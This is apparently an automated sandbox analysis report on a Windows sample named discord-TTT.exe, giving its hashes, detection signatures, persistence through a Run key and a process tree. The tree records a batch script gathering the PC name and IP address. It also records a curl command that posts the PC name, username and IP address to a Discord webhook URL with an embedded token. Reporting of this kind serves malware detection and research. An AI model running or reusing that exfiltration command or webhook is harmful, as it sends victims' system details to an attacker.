Analysis

  • max time kernel
    6s
  • max time network
    5s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    02/08/2024, 22:08

General

  • Target

    discord-TTT.exe

  • Size

    154KB

  • MD5

    0e67157d1b3263729784e62105b4756f

  • SHA1

    a7f1ddf004d293dd8d6fd880ae5583a52bac0635

  • SHA256

    a84e2b1012bbfdbcc247a580e858cb7f04bfe86f9e727a84ccfee64e45f3c109

  • SHA512

    b21c32e6a5639efb1d49cb4f76dba8d4b1444666ef93c41a170cfde90d3ff90b9c0a1dd7b19a3e411f6a19ee1ce7fee44bef2e07f621eb622776a01942913964

  • SSDEEP

    3072:gahKyd2n31h5GWp1icKAArDZz4N9GhbkrNEk1CT:gahOdp0yN90QEd

Score
6/10

Malware Config

Signatures

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\discord-TTT.exe
    "C:\Users\Admin\AppData\Local\Temp\discord-TTT.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3444
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c "discord.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1448
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c nslookup SYMRKCCU | findstr /c:"Address:"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1396
        • C:\Windows\system32\nslookup.exe
          nslookup SYMRKCCU
          4⤵
            PID:3056
          • C:\Windows\system32\findstr.exe
            findstr /c:"Address:"
            4⤵
              PID:4468
          • C:\Windows\system32\curl.exe
            curl -H "Content-Type: application/json" -X POST -d "{\"content\":\"PC Name: SYMRKCCU\nUsername: Admin\nIP Address: 8.8.8.8\"}" https://discord.com/api/webhooks/1236334882985218179/S7WSzhe6PWIirNmvsPHgCd_PKDE3dcN4l17JQO6rEcKTlbbAPa8ThVvv4M-7SGstvOL5
            3⤵
              PID:1288
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4072,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:8
          1⤵
            PID:760

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\discord.bat

    Filesize
    464B

    MD5
    7858122dd3a683d64029080d6c01f485

    SHA1
    a97547489baa110fd7e28884658a1e00bab845b3

    SHA256
    12f9a3a0baffd7aefd7e8943f3b08744bbe60e63806569da5772d2613605aa50

    SHA512
    a93a74ac945e1d8de6f6c3c09c8dee2236af1d36b132153a4c4492f98f38421cca18263c6f03f92c952b437589a770705f63c92dcce6c6636f5a6f876e3d6b84